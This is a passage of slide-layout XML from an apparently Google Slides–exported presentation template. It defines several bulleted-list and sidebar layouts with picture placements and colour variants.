          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1502" name="Google Shape;1502;p79"/>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7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04" name="Google Shape;1504;p7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505" name="Google Shape;1505;p7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506" name="Google Shape;1506;p7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507" name="Google Shape;1507;p7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508" name="Google Shape;1508;p7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09" name="Google Shape;1509;p79"/>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10" name="Google Shape;1510;p79"/>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79"/>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79"/>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79"/>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14" name="Google Shape;1514;p79"/>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15" name="Google Shape;1515;p79"/>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516" name="Google Shape;1516;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1517" name="Google Shape;1517;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1518" name="Google Shape;1518;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1519" name="Google Shape;1519;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>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28. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1520"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1521" name="Google Shape;1521;p80"/>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8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23" name="Google Shape;1523;p8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524" name="Google Shape;1524;p8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525" name="Google Shape;1525;p8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526" name="Google Shape;1526;p8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527" name="Google Shape;1527;p8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28" name="Google Shape;1528;p80"/>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29" name="Google Shape;1529;p80"/>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80"/>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80"/>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80"/>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33" name="Google Shape;1533;p80"/>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34" name="Google Shape;1534;p80"/>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535" name="Google Shape;1535;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536" name="Google Shape;1536;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1537" name="Google Shape;1537;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1538" name="Google Shape;1538;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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29. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1539"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1540" name="Google Shape;1540;p81"/>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8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42" name="Google Shape;1542;p8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543" name="Google Shape;1543;p8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544" name="Google Shape;1544;p8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545" name="Google Shape;1545;p8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546" name="Google Shape;1546;p8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47" name="Google Shape;1547;p81"/>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48" name="Google Shape;1548;p81"/>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81"/>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81"/>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81"/>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52" name="Google Shape;1552;p81"/>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53" name="Google Shape;1553;p81"/>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554" name="Google Shape;1554;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1555" name="Google Shape;1555;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1556" name="Google Shape;1556;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1557" name="Google Shape;1557;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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8. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="119" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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 name="Google Shape;69;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="38976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70" name="Google Shape;70;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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 name="Google Shape;71;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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 name="Google Shape;72;p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3" name="Google Shape;73;p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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p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5" name="Google Shape;75;p9"/>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30. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1558"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1559" name="Google Shape;1559;p82"/>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8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61" name="Google Shape;1561;p8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562" name="Google Shape;1562;p8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563" name="Google Shape;1563;p8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564" name="Google Shape;1564;p8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565" name="Google Shape;1565;p8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66" name="Google Shape;1566;p82"/>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67" name="Google Shape;1567;p82"/>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82"/>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82"/>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82"/>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71" name="Google Shape;1571;p82"/>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72" name="Google Shape;1572;p82"/>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573" name="Google Shape;1573;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1574" name="Google Shape;1574;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1575" name="Google Shape;1575;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1576" name="Google Shape;1576;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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31. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1577"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1578" name="Google Shape;1578;p83"/>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8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80" name="Google Shape;1580;p8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581" name="Google Shape;1581;p8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582" name="Google Shape;1582;p8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583" name="Google Shape;1583;p8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584" name="Google Shape;1584;p8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85" name="Google Shape;1585;p83"/>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86" name="Google Shape;1586;p83"/>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83"/>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83"/>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83"/>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90" name="Google Shape;1590;p83"/>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91" name="Google Shape;1591;p83"/>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92" name="Google Shape;1592;p83"/>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83"/>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594" name="Google Shape;1594;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1595" name="Google Shape;1595;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1596" name="Google Shape;1596;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1597" name="Google Shape;1597;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1598" name="Google Shape;1598;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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32. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1599"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1600" name="Google Shape;1600;p84"/>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8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02" name="Google Shape;1602;p8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603" name="Google Shape;1603;p8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604" name="Google Shape;1604;p8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605" name="Google Shape;1605;p8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606" name="Google Shape;1606;p8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07" name="Google Shape;1607;p84"/>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08" name="Google Shape;1608;p84"/>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84"/>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84"/>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84"/>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12" name="Google Shape;1612;p84"/>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13" name="Google Shape;1613;p84"/>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14" name="Google Shape;1614;p84"/>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84"/>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616" name="Google Shape;1616;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1617" name="Google Shape;1617;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1618" name="Google Shape;1618;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1619" name="Google Shape;1619;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1620" name="Google Shape;1620;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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33. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1621"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1622" name="Google Shape;1622;p85"/>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8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24" name="Google Shape;1624;p8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625" name="Google Shape;1625;p8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626" name="Google Shape;1626;p8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627" name="Google Shape;1627;p8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628" name="Google Shape;1628;p8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29" name="Google Shape;1629;p85"/>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30" name="Google Shape;1630;p85"/>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85"/>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85"/>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85"/>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34" name="Google Shape;1634;p85"/>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35" name="Google Shape;1635;p85"/>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36" name="Google Shape;1636;p85"/>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85"/>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638" name="Google Shape;1638;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1639" name="Google Shape;1639;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1640" name="Google Shape;1640;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1641" name="Google Shape;1641;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1642" name="Google Shape;1642;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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34. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1643"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
